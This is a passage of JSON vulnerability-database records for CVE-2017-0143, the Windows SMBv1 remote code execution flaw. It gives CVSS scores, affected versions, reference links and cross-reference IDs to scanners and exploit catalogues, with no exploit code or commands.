"openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 9.2, "vector": "NONE"}, "twitter": {"counter": 27, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/VulmonFeeds/status/1354747318004805632", "text": "CVE-2017-0143\n\nThe SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Ser...\n\nhttps://t.co/qJj60LUVMn?amp=1\n\nIntelligence based vulnerability management: https://t.co/zWLn5A4tTA?amp=1"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], "hash": "350cadcb180e0f590eb554c36f0ac10d6d71a2c746cb1937dbbf31b156514eef", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "2f4290596ecc563b65873431415d8e8a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 154}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:16:45", "value": 9.2, "vector": "NONE"}}, "hash": "e4af194c658335f20de37ce25365f1134c75d50d29f9120d94284d96ba82dba4", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "23f9a0531c4b1edff05174a9af52b9a4", "key": "references"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "lastseen": "2019-05-29T18:16:45", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 7}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 9.2, "vector": "NONE"}}, "hash": "79fd1a8ef762445cbc3425bdfcff7f1dabd0be379d6cbe8c8d3bcfa2c61c8c29", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "2f4290596ecc563b65873431415d8e8a", "key": "references"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 114}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:18:44", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", 